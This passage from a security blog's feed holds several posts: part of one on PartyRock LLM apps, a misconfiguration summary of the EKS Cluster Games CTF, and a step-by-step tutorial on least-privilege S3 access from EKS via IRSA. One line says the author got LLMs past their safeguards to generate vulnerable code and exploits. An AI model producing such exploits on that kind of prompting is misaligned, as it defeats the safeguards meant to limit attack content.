<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701002172064/8886e112-d99d-42e1-8db4-03c2fe793f8b.png" alt class="image--center mx-auto" /></p>
<p>This can easily be expanded to write an entire storybook. For example, once the image is generated, create a new widget to suggest the next 4 story lines, take user input, update the image &amp; suggest the next 4 story paths to move ahead. This will be a lot of fun!</p>
<p>Coming from a security background, I was curious about how this could help with security-related work. Let's benchmark!</p>
<h3 id="heading-ctf-challenges-builder">CTF Challenges Builder</h3>
<p>Security teams are enthusiastic about playing CTFs that include challenges from different areas like cryptography, steganography, web, mobile, network, reversing, malware &amp; so on. We can use this to generate ideas for innovative CTF challenges &amp; chaining of attacks.</p>
<p><strong>NOTE: I'm not making this app public as I hacked my way into the LLMs to make it generate vulnerable code for various tech stacks &amp; exploit it.</strong></p>
<h4 id="heading-ssrf-vulnerability">SSRF vulnerability</h4>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701004048474/62fefd7a-5ebd-4697-a3a3-da9cc22f3bdc.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701004090158/3391ced8-b826-4423-aa3c-f06c79b6707c.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-host-header-injection-vulnerability">Host Header Injection Vulnerability</h4>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701004197801/dbc42e45-e97d-4578-8edd-9a02db017e2e.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701004224928/f09baf23-37bd-40ce-b4b3-e6e6730ecd3f.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-architecture-threat-modeler">Architecture Threat Modeler</h3>
<p>Developers, DevOps, and security teams regularly review different system architectures, looking for misconfigurations &amp; vulnerabilities.</p>
<p><a target="_blank" href="https://partyrock.aws/u/testinguser883/R4PI1UIc2/Architecture-Threat-Modeler">This app</a> takes the architecture design as input,</p>
<ul>
<li><p>Lists all the possible components that are required to build the design</p>
</li>
<li><p>Once components are identified, it suggests possible Threat Boundaries between all components</p>
</li>
<li><p>Then, it browses the internet &amp; suggests available open-source projects that match the given architecture</p>
</li>
</ul>
<h4 id="heading-3-tier-architecture-in-aws">3 tier architecture in AWS</h4>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701002755626/56a64531-cbe4-4d5d-ba93-40aa2554a857.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-3-tier-architecture-in-azure">3 tier architecture in Azure</h4>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701003087033/7823da03-0ab4-42a1-8d0f-c50f8c2a8566.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-conclusion">Conclusion</h3>
<p>The synchronous prompt chaining feature in PartyRock excited me the most. Updating the main question triggers the execution of the app and generates content; that content is automatically passed as input to another prompt to perform further operations, and so on, which makes it powerful.</p>
]]></content:encoded></item><item><title><![CDATA[Decoding EKS Cluster Games CTF]]></title><description><![CDATA[EKS Cluster Games is a decent cybersecurity CTF that revolves around Kubernetes on AWS & security. You get 5 challenges to solve. If you are new to Kubernetes security, this is a nice way to assess yourself.
I've completed all the challenges & got th...]]></description><link>https://blog.rewanthtammana.com/decoding-eks-cluster-games-ctf</link><guid isPermaLink="true">https://blog.rewanthtammana.com/decoding-eks-cluster-games-ctf</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[EKS]]></category><category><![CDATA[AWS]]></category><category><![CDATA[CTF]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Sun, 12 Nov 2023 01:46:13 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1699753668036/8ee98c28-8ce3-4964-85eb-dcedbd3436c2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><a target="_blank" href="https://eksclustergames.com">EKS Cluster Games</a> is a decent <a target="_blank" href="https://en.wikipedia.org/wiki/Capture_the_flag_(cybersecurity)">cybersecurity CTF</a> that revolves around Kubernetes on AWS &amp; security. You get 5 challenges to solve. If you are new to Kubernetes security, this is a nice way to assess yourself.</p>
<p>I've completed all the challenges &amp; got this certificate.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1699750928170/37d42823-044e-4d12-872f-efc2664a13e2.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1699750995078/79e08ba3-c8f6-45c6-a4a2-f1acd7207fa0.png" alt class="image--center mx-auto" /></p>
<p>The challenges are fun &amp; I don't want to spoil the thrill for you. Hence, we won't discuss the solutions here; instead, we will look at the types of misconfigurations in each challenge that lead to system compromise.</p>
<h3 id="heading-challenge-1-exposed-secrets"><strong>Challenge 1: Exposed Secrets</strong></h3>
<ul>
<li><p><strong>Vulnerability</strong>: Unrestricted access to Kubernetes secrets.</p>
</li>
<li><p><strong>Root Cause</strong>: Overly permissive RBAC (Role-Based Access Control) settings granted broader access rights than necessary, exposing the Kubernetes secrets.</p>
</li>
<li><p><strong>Patch</strong>: Restrict access to secrets using RBAC, ensuring only necessary roles have the 'get secrets' permission (see the sketch after this list).</p>
</li>
</ul>
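<p>As a concrete example of such a patch, RBAC access can be scoped down to a single named secret instead of all secrets in a namespace (a sketch; the names are hypothetical):</p>
<pre><code class="lang-bash"># Allow reading only the "app-config" secret in the "dev" namespace
kubectl create role secret-reader --verb=get --resource=secrets --resource-name=app-config -n dev
# Bind the role to the workload's service account
kubectl create rolebinding secret-reader-binding --role=secret-reader --serviceaccount=dev:app-sa -n dev
</code></pre>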
<h3 id="heading-challenge-2-exposed-image-pull-secrets"><strong>Challenge 2:</strong> Exposed Image Pull Secrets</h3>
<ul>
<li><p><strong>Vulnerability</strong>: Improper management of container image pull secrets.</p>
</li>
<li><p><strong>Root Cause</strong>: Lack of segregation and restriction on secret access, allowing unauthorized retrieval of sensitive data.</p>
</li>
<li><p><strong>Patch</strong>: Regularly audit and restrict access to image pull secrets. Apply appropriate RBAC policies.</p>
</li>
</ul>
<h3 id="heading-challenge-3-metadata-service-exploitation"><strong>Challenge 3: Metadata Service Exploitation</strong></h3>
<ul>
<li><p><strong>Vulnerability</strong>: Unrestricted access to the EC2 instance metadata service (IMDSv1) from within the Kubernetes pod.</p>
</li>
<li><p><strong>Root Cause</strong>: Default configuration of IMDSv1 allows any process within the instance to access sensitive IAM credentials.</p>
</li>
<li><p><strong>Patch</strong>: Restrict or disable IMDSv1 access and migrate to IMDSv2, which requires a session token to access metadata (see the sketch after this list). Additionally, if not required, block pod access to instance metadata using network policies or iptables.</p>
</li>
</ul>
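<p>As a reference for the IMDSv2 patch above, requiring session tokens and keeping the hop limit at 1 (so responses can't cross the extra network hop a pod adds) is a single call per instance (a sketch; substitute your node's instance ID):</p>
<pre><code class="lang-bash">aws ec2 modify-instance-metadata-options \
  --instance-id &lt;node-instance-id&gt; \
  --http-tokens required \
  --http-put-response-hop-limit 1
</code></pre>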
<h3 id="heading-challenge-4-iam-role-misconfiguration"><strong>Challenge 4: IAM Role</strong> Misconfiguration</h3>
<ul>
<li><p><strong>Vulnerability</strong>: The service account had zero permissions, but the ability to assume the node’s IAM role led to exploitation.</p>
</li>
<li><p><strong>Root Cause</strong>: Excessive IAM permissions granted to the node role, which can be misused if accessed.</p>
</li>
<li><p><strong>Patch</strong>: The principle of least privilege should be enforced for IAM roles associated with Kubernetes nodes and services.</p>
</li>
</ul>
<h3 id="heading-challenge-5-flawed-iam-trust-policy"><strong>Challenge 5: Flawed IAM Trust Policy</strong></h3>
<ul>
<li><p><strong>Vulnerability</strong>: Flaws in the IAM role trust policy allowed unintended access.</p>
</li>
<li><p><strong>Root Cause</strong>: The trust policy lacked an essential check on the subject claim, allowing any service account in the cluster to assume the role.</p>
</li>
<li><p><strong>Patch</strong>: Revise IAM trust policies to include stringent conditions, like checking that the <code>sub</code> claim matches specific service accounts, so other identities cannot escalate privileges.</p>
</li>
</ul>
<h3 id="heading-conclusion">Conclusion</h3>
<p>These vulnerabilities are just the tip of the iceberg in containers, Kubernetes &amp; cloud security space. It's always important to have automated systems to look for possible vulnerabilities &amp; misconfigurations.</p>
<p>Want to learn more about EKS security? Make sure to subscribe to the newsletter. I've a series coming up soon!</p>
]]></content:encoded></item><item><title><![CDATA[Securing AWS EKS: Implementing Least-Privilege Access with IRSA]]></title><description><![CDATA[Ensuring least-privilege access in Kubernetes can be complex at times for security & DevOps teams. This blog aims to cover a variety of scenarios where the EKS cluster connects with other AWS resources. This is the architecture of the multiple scenar...]]></description><link>https://blog.rewanthtammana.com/securing-aws-eks-implementing-least-privilege-access-with-irsa</link><guid isPermaLink="true">https://blog.rewanthtammana.com/securing-aws-eks-implementing-least-privilege-access-with-irsa</guid><category><![CDATA[AWS]]></category><category><![CDATA[IAM]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[EKS]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Thu, 12 Oct 2023 06:42:39 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1696769385227/40723bb9-34ef-4467-be19-29e21f8db6fa.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Ensuring least-privilege access in Kubernetes can be complex at times for security &amp; DevOps teams. This blog aims to cover a variety of scenarios where the EKS cluster connects with other AWS resources. This is the architecture of the multiple scenarios we will build.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696781275440/64c8cd8c-3e96-4e41-b560-af245024a7ae.png" alt class="image--center mx-auto" /></p>
<p>Different ways to connect with AWS services:</p>
<ol>
<li><p>Using IAM User Credentials through Environment Variables</p>
</li>
<li><p>Assign permissions to the EKS worker nodes</p>
</li>
<li><p>IAM Roles for Service Accounts (IRSA)</p>
</li>
</ol>
<h3 id="heading-prerequisites">Prerequisites</h3>
<p>Before getting started, a few terminologies to get familiar with.</p>
<p>IRSA refers to "IAM Roles for Service Accounts".</p>
<p>An OpenID Connect (OIDC) identity provider is an IAM entity that lets you federate external identities into AWS in a scalable and secure way. In the context of Amazon EKS, OIDC is used to associate IAM roles with Kubernetes service accounts. This allows Kubernetes pods to assume specific IAM roles, providing a secure and fine-grained way to grant AWS permissions to pods.</p>
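<p>For reference, each EKS cluster exposes its OIDC issuer URL, which is what the IAM OIDC provider gets created from. You can view it with (a quick check, assuming the <code>$cluster_name</code> variable set in the EKS cluster section below):</p>
<pre><code class="lang-bash"># The issuer URL that signs the projected service account tokens used by IRSA
aws eks describe-cluster --name $cluster_name --query "cluster.identity.oidc.issuer" --output text
</code></pre>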
<h3 id="heading-scenario">Scenario</h3>
<p>Assume we have an application that fetches random images from the internet every 30 seconds, &amp; uploads them to an s3 bucket.</p>
<p>To deploy this application, the primary requirement is to enable the application to authenticate with the S3 bucket and push images.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696667114339/3d41215b-2d2e-43a5-acfb-df852d02c237.png" alt /></p>
<p>The code is available in the repository below, in case you want to build your own image or use the existing one.</p>
<pre><code class="lang-bash">IMAGE=rewanthtammana/secure-eks:v1
git <span class="hljs-built_in">clone</span> https://github.com/rewanthtammana/secure-eks
<span class="hljs-built_in">cd</span> secure-eks/least-privilege-access
docker build -t <span class="hljs-variable">$IMAGE</span> .
docker push <span class="hljs-variable">$IMAGE</span>
</code></pre>
<h3 id="heading-create-required-aws-resources">Create required AWS resources</h3>
<h4 id="heading-change-aws-cli-output-from-vim-to-terminal">Change AWS CLI Output from Vim to Terminal</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> AWS_PAGER=
</code></pre>
<h4 id="heading-eks-cluster">EKS cluster</h4>
<p>Make sure to have a cluster. If you don't, create one.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> cluster_name=secure-eks
eksctl create cluster <span class="hljs-variable">$cluster_name</span> -M 1 -m 1 --ssh-access
</code></pre>
<h4 id="heading-create-s3-bucket">Create s3 bucket</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> bucket_name=secure-eks-s3-$(uuidgen | tr <span class="hljs-string">'[:upper:]'</span> <span class="hljs-string">'[:lower:]'</span>)
aws s3api create-bucket --bucket <span class="hljs-variable">$bucket_name</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Created bucket: <span class="hljs-variable">$bucket_name</span>"</span>
</code></pre>
<h4 id="heading-create-a-policy-to-allow-write-operations-to-this-s3-bucket">Create a policy to allow write operations to this S3 bucket</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">"{
    \"Version\": \"2012-10-17\",
    \"Statement\": [
        {
            \"Effect\": \"Allow\",
            \"Action\": [
                \"s3:PutObject\"
            ],
            \"Resource\": [
                \"arn:aws:s3:::<span class="hljs-variable">$bucket_name</span>/*\"
            ]
        }
    ]
}"</span> &gt; s3-<span class="hljs-variable">$bucket_name</span>-access.json

<span class="hljs-built_in">export</span> policy_name=secure-eks-s3-write-policy
<span class="hljs-built_in">export</span> create_policy_output=$(aws iam create-policy --policy-name <span class="hljs-variable">$policy_name</span> --policy-document file://s3-<span class="hljs-variable">$bucket_name</span>-access.json)
<span class="hljs-built_in">export</span> policy_arn=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$create_policy_output</span> | jq -r <span class="hljs-string">'.Policy.Arn'</span>)
</code></pre>
<h3 id="heading-using-iam-user-credentials-through-environment-variables">Using IAM User Credentials through Environment Variables</h3>
<p>Now we have the cluster &amp; the S3 bucket. To ensure our application can connect with the S3 bucket, we need to create an IAM user with permission to write to it.</p>
<h4 id="heading-create-iam-user">Create IAM user</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> iam_user=secure-eks-iam-user
aws iam create-user --user-name <span class="hljs-variable">$iam_user</span>
</code></pre>
<h4 id="heading-attach-the-policy-to-the-iam-user">Attach the policy to the IAM user</h4>
<pre><code class="lang-bash">aws iam attach-user-policy --user-name <span class="hljs-variable">$iam_user</span> --policy-arn <span class="hljs-variable">$policy_arn</span>
</code></pre>
<h4 id="heading-create-access-amp-secret-key-for-iam-user">Create access &amp; secret key for IAM user</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> results=$(aws iam create-access-key --user-name <span class="hljs-variable">$iam_user</span>)
<span class="hljs-built_in">export</span> access_key=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$results</span> | jq -r <span class="hljs-string">'.AccessKey.AccessKeyId'</span>)
<span class="hljs-built_in">export</span> secret_key=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$results</span> | jq -r <span class="hljs-string">'.AccessKey.SecretAccessKey'</span>)
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Access Key: <span class="hljs-variable">$access_key</span>"</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Secret Key: <span class="hljs-variable">$secret_key</span>"</span>
</code></pre>
<h4 id="heading-create-kubernetes-job">Create Kubernetes Job</h4>
<p>With the access &amp; secret keys from above, we can allow our application to connect to the specific S3 bucket.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">"apiVersion: batch/v1
kind: Job
metadata:
  name: environment-variables-job
spec:
  template:
    spec:
      containers:
      - name: environment-variables-container
        image: rewanthtammana/secure-eks:v1
        env:
        - name: AWS_REGION
          value: us-east-1
        - name: AWS_ACCESS_KEY
          value: <span class="hljs-variable">$access_key</span>
        - name: AWS_SECRET_KEY
          value: <span class="hljs-variable">$secret_key</span>
        - name: S3_BUCKET_NAME
          value: <span class="hljs-variable">$bucket_name</span>
      restartPolicy: Never"</span> | kubectl apply -f-
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696667114339/3d41215b-2d2e-43a5-acfb-df852d02c237.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-summary">Summary</h4>
<p>We successfully connected our application with the AWS S3 bucket to push its images. But from an operational &amp; security standpoint, this isn't the best approach.</p>
<ul>
<li><p>It's complex to maintain, rotate &amp; secure these credentials from leaking.</p>
</li>
<li><p>What if someone gets their hand on the authentication details?</p>
</li>
<li><p>What if they use it to exfiltrate the data?</p>
</li>
<li><p>What if they use it to manipulate the information?</p>
</li>
<li><p>How to differentiate b/w legitimate &amp; malicious requests?</p>
</li>
</ul>
<p>A lot of questions pop up &amp; it ain't pretty. We will discuss alternate &amp; better ways to accomplish the goal in the following sections.</p>
<h4 id="heading-cleanup">Cleanup</h4>
<p>Delete the resources before proceeding to the next section.</p>
<pre><code class="lang-bash">aws iam detach-user-policy --user-name <span class="hljs-variable">$iam_user</span> --policy-arn <span class="hljs-variable">$policy_arn</span>
aws iam delete-access-key --access-key-id <span class="hljs-variable">$access_key</span> --user-name <span class="hljs-variable">$iam_user</span>
aws iam delete-user --user-name <span class="hljs-variable">$iam_user</span>
</code></pre>
<h3 id="heading-assign-permissions-to-the-eks-worker-nodes">Assign permissions to the EKS worker nodes</h3>
<p>In the above scenario, we learned that it's challenging to secure and rotate the access keys, etc. An alternative approach would be to assign permissions to the EKS worker nodes to access the s3 bucket.</p>
<h4 id="heading-get-eks-worker-node-arn">Get EKS worker node ARN</h4>
<p>In this case, we created a single-node cluster, so we have only one worker node.</p>
<pre><code class="lang-bash">eks_worker_node_role_name=$(eksctl get nodegroup --cluster <span class="hljs-variable">$cluster_name</span> -o json | jq -r <span class="hljs-string">'.[].NodeInstanceRoleARN'</span> | cut -d <span class="hljs-string">'/'</span> -f 2)
</code></pre>
<h4 id="heading-attach-the-policy-to-the-eks-worker-node-role">Attach the policy to the EKS worker node role</h4>
<pre><code class="lang-bash">aws iam attach-role-policy --role-name <span class="hljs-variable">$eks_worker_node_role_name</span> --policy-arn <span class="hljs-variable">$policy_arn</span>
</code></pre>
<h4 id="heading-create-kubernetes-job-1">Create Kubernetes Job</h4>
<p>Make sure the <code>bucket_name</code> environment variable is still set.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">"apiVersion: batch/v1
kind: Job
metadata:
  name: environment-variables-job
spec:
  template:
    spec:
      containers:
      - name: environment-variables-container
        image: rewanthtammana/secure-eks:ok-amd64
        env:
        - name: AWS_REGION
          value: us-east-1
        - name: S3_BUCKET_NAME
          value: <span class="hljs-variable">$bucket_name</span>
      restartPolicy: Never"</span> | kubectl apply -f-
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696746570810/a55ff930-9385-4876-8841-861169c58bdf.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-summary-1">Summary</h4>
<p>This is better than the previous method, but the issue with this approach is that any pod scheduled on this node inherits these excessive permissions (in this case, S3 bucket push permissions), violating the least-privilege principle. To overcome this risk, we will use IRSA.</p>
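<p>To see the risk concretely, any throwaway pod scheduled on the node can write to the bucket (a sketch, assuming the public <code>amazon/aws-cli</code> image and that the node role policy from above is still attached):</p>
<pre><code class="lang-bash"># The pod inherits the node role's credentials via the instance metadata service
kubectl run node-role-check --rm -it --restart=Never \
  --image=amazon/aws-cli --env=AWS_DEFAULT_REGION=us-east-1 \
  -- s3api put-object --bucket $bucket_name --key node-role-check.txt
</code></pre>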
<h4 id="heading-cleanup-1">Cleanup</h4>
<p>Detach the role policy before proceeding to the next section.</p>
<pre><code class="lang-bash">aws iam detach-role-policy --role-name <span class="hljs-variable">$eks_worker_node_role_name</span> --policy-arn <span class="hljs-variable">$policy_arn</span>
</code></pre>
<h3 id="heading-iam-roles-for-service-accounts-irsa">IAM Roles for Service Accounts (IRSA)</h3>
<h4 id="heading-check-if-the-iam-openid-connect-provider-status">Check if the IAM OpenID Connect provider status</h4>
<pre><code class="lang-bash">eksctl get cluster <span class="hljs-variable">$cluster_name</span> -ojson | jq -r <span class="hljs-string">'.[].Tags["alpha.eksctl.io/cluster-oidc-enabled"]'</span>
</code></pre>
<h4 id="heading-create-iam-openid-connect-provider">Create IAM OpenID Connect provider</h4>
<p>If it's not enabled, enable it</p>
<pre><code class="lang-bash">eksctl utils associate-iam-oidc-provider --cluster <span class="hljs-variable">$cluster_name</span> --approve
</code></pre>
<h4 id="heading-create-a-policy-to-allow-access-to-the-s3-bucket">Create a policy to allow access to the S3 bucket</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">"{
    \"Version\": \"2012-10-17\",
    \"Statement\": [
        {
            \"Effect\": \"Allow\",
            \"Action\": [
                \"s3:PutObject\"
            ],
            \"Resource\": [
                \"arn:aws:s3:::<span class="hljs-variable">$bucket_name</span>/*\"
            ]
        }
    ]
}"</span> &gt; s3-<span class="hljs-variable">$bucket_name</span>-access.json

<span class="hljs-built_in">export</span> policy_name=secure-eks-s3-write-policy
<span class="hljs-built_in">export</span> create_policy_output=$(aws iam create-policy --policy-name <span class="hljs-variable">$policy_name</span> --policy-document file://s3-<span class="hljs-variable">$bucket_name</span>-access.json)
<span class="hljs-built_in">export</span> policy_arn=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$create_policy_output</span> | jq -r <span class="hljs-string">'.Policy.Arn'</span>)
</code></pre>
<h4 id="heading-create-an-iam-service-account-with-the-above-policy">Create an IAM service account with the above policy</h4>
<pre><code class="lang-bash">eks_service_account=s3-write-service-account
eksctl create iamserviceaccount --name <span class="hljs-variable">$eks_service_account</span> --namespace default --cluster <span class="hljs-variable">$cluster_name</span> --attach-policy-arn <span class="hljs-variable">$policy_arn</span> --approve
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696751669138/048b0bd2-6113-4de6-b4ae-33b24c758902.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-create-kubernetes-job-2">Create Kubernetes Job</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">"apiVersion: batch/v1
kind: Job
metadata:
  name: environment-variables-job
spec:
  template:
    spec:
      serviceAccountName: <span class="hljs-variable">$eks_service_account</span>
      containers:
      - name: environment-variables-container
        image: rewanthtammana/secure-eks:ok-amd64
        env:
        - name: AWS_REGION
          value: us-east-1
        - name: S3_BUCKET_NAME
          value: <span class="hljs-variable">$bucket_name</span>
      restartPolicy: Never"</span> | kubectl apply -f-
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696756242465/56362ebb-58af-4cbe-95d0-12b709c49ec0.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-cloudformation-jwt-x509-amp-more">CloudFormation, JWT, X509 &amp; more</h3>
<h4 id="heading-examine-cloudformation-of-iam-service-account-creation">Examine CloudFormation of IAM service account creation</h4>
<p>If we observe the above output, CloudFormation was used to create the required resources. Let's have a look at the CloudFormation console to see the list of created resources.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696751835503/0e14ff80-055d-4d23-8679-66458450eb1e.png" alt class="image--center mx-auto" /></p>
<p>Click on the "Physical ID" link to look at the role permissions</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696751929998/26589a4e-e14d-484b-b7ac-95b58e34d59a.png" alt class="image--center mx-auto" /></p>
<p>Now we know the service account <code>s3-write-service-account</code> is linked to an IAM role that has permission to upload data to the specific S3 bucket.</p>
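<p>If you want to see how the federation is wired, inspect the role's trust policy; it should name the cluster's OIDC provider as the federated principal and condition the <code>sub</code> claim on this exact service account (a sketch; substitute the role name shown as the Physical ID):</p>
<pre><code class="lang-bash"># Replace with the role name from the CloudFormation "Physical ID" column
role_name=&lt;physical-id-role-name&gt;
aws iam get-role --role-name $role_name | jq -r '.Role.AssumeRolePolicyDocument'
</code></pre>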
<h4 id="heading-examine-service-account">Examine service account</h4>
<p>Let's enumerate the service account for more information.</p>
<pre><code class="lang-bash">kubectl get sa <span class="hljs-variable">$eks_service_account</span> -oyaml
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696753039618/9e50cf78-25ae-4b1e-b368-2f8c7274afe5.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-examine-secrets-associated-with-the-service-account">Examine secrets associated with the service account</h4>
<p>Get the contents of the secret associated with the service account</p>
<pre><code class="lang-bash">sa_secret_name=$(kubectl get sa <span class="hljs-variable">$eks_service_account</span> -ojson | jq -r <span class="hljs-string">'.secrets[0].name'</span>)
kubectl get secrets <span class="hljs-variable">$sa_secret_name</span> -oyaml
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696753280181/4abd70e5-7ae5-4f0b-b2a8-2e10a9bb2aa0.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-examine-x509-cacrt-in-the-secret-associated-with-the-service-account">Examine X.509 ca.crt in the secret associated with the service account</h4>
<p>In the above image, we can see the <code>ca.crt</code> certificate. Let's decode the certificate to view information like expiry, issuer, etc.</p>
<pre><code class="lang-bash">kubectl get secret <span class="hljs-variable">$sa_secret_name</span> -o json | jq -r <span class="hljs-string">'.data."ca.crt"'</span> | base64 -d
kubectl get secret <span class="hljs-variable">$sa_secret_name</span> -o json | jq -r <span class="hljs-string">'.data."ca.crt"'</span> | base64 -d &gt; certificate.pem
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696753960598/beebbc18-9f08-4816-acd5-66d4fcd78cdc.png" alt class="image--center mx-auto" /></p>
<p>Check the subject &amp; issuer of the certificate</p>
<pre><code class="lang-bash">openssl x509 -<span class="hljs-keyword">in</span> certificate.pem -subject -issuer -noout
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696753997798/fc5cfc0c-2a16-4eb4-b66b-41a4349d27af.png" alt class="image--center mx-auto" /></p>
<p>Check the expiry of the certificate</p>
<pre><code class="lang-bash">openssl x509 -<span class="hljs-keyword">in</span> certificate.pem -dates -noout
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696754048360/7668d072-f4d4-415b-8a43-242825e3b2c5.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-examine-the-token-in-the-secret-associated-with-the-service-account">Examine the token in the secret associated with the service account</h4>
<pre><code class="lang-bash">kubectl get secret <span class="hljs-variable">$sa_secret_name</span> -o json | jq -r <span class="hljs-string">'.data."token"'</span> | base64 -d
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696754149658/6269f2cc-c665-4bc2-a375-514096a7f788.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-examine-the-jwt-token-in-jwtio">Examine the JWT token in jwt.io</h4>
<p>Copy the token from the above step, visit <a target="_blank" href="https://jwt.io/">jwt.io</a> &amp; paste it there. As you can see below, the token carries a lot of information like the issuer, namespace, secret name, service account name, etc. If you tamper with any of it, the signature check fails and the token is rejected.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696754633273/b0fd0370-acde-4c0c-8c36-90c0377bb4dd.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-cleanup-2">Cleanup</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># From previous sections, if you missed there</span>
aws iam detach-user-policy --user-name <span class="hljs-variable">$iam_user</span> --policy-arn <span class="hljs-variable">$policy_arn</span>
aws iam detach-role-policy --role-name <span class="hljs-variable">$eks_worker_node_role_name</span> --policy-arn <span class="hljs-variable">$policy_arn</span>
aws iam delete-access-key --access-key-id <span class="hljs-variable">$access_key</span> --user-name <span class="hljs-variable">$iam_user</span>
aws iam delete-user --user-name <span class="hljs-variable">$iam_user</span>

<span class="hljs-comment"># Actual cleanup</span>
aws iam delete-policy --policy-arn <span class="hljs-variable">$policy_arn</span>
aws s3 rm s3://<span class="hljs-variable">$bucket_name</span> --recursive
aws s3 rb s3://<span class="hljs-variable">$bucket_name</span>
eksctl delete iamserviceaccount --name <span class="hljs-variable">$eks_service_account</span> --namespace default --cluster <span class="hljs-variable">$cluster_name</span>
eksctl delete cluster --name <span class="hljs-variable">$cluster_name</span>
</code></pre>
<h3 id="heading-conclusion">Conclusion</h3>
<p>To conclude, securing access control within Amazon EKS, especially when interacting with other AWS services, requires a meticulous approach to safeguard against unauthorized access and potential breaches. Through the methods explored in this blog - from embedding IAM user credentials and assigning permissions to EKS worker nodes to the more refined and secure approach of IAM Roles for Service Accounts (IRSA) - we've traversed the landscape of EKS access management.</p>
<p>IRSA stands out in terms of security and manageability, providing a mechanism that adheres to the principle of least privilege by assigning AWS permissions to pods, not nodes, thereby reducing the attack surface. It leverages the existing IAM OpenID Connect (OIDC) provider, ensuring a secure and auditable way to utilize AWS services directly from Kubernetes workloads.</p>
<p>This is not the end. Security is an ever-evolving domain &amp; as technologies advance, so do the methodologies to exploit them.</p>
]]></content:encoded></item><item><title><![CDATA[Managing AWS IAM in GitOps Style]]></title><description><![CDATA[Problem
In the modern era of cloud computing, managing infrastructure has evolved beyond manual configurations to embrace GitOps, a paradigm rooted in Infrastructure as Code (IaC). In this comprehensive guide, we'll delve into managing AWS Identity a...]]></description><link>https://blog.rewanthtammana.com/managing-aws-iam-in-gitops-style</link><guid isPermaLink="true">https://blog.rewanthtammana.com/managing-aws-iam-in-gitops-style</guid><category><![CDATA[AWS]]></category><category><![CDATA[IAM]]></category><category><![CDATA[gitops]]></category><category><![CDATA[Terraform]]></category><category><![CDATA[Beginner Developers]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Tue, 29 Aug 2023 05:34:07 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1692761183705/59bc5b43-e255-473c-aa6a-23ac69385c36.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3 id="heading-problem">Problem</h3>
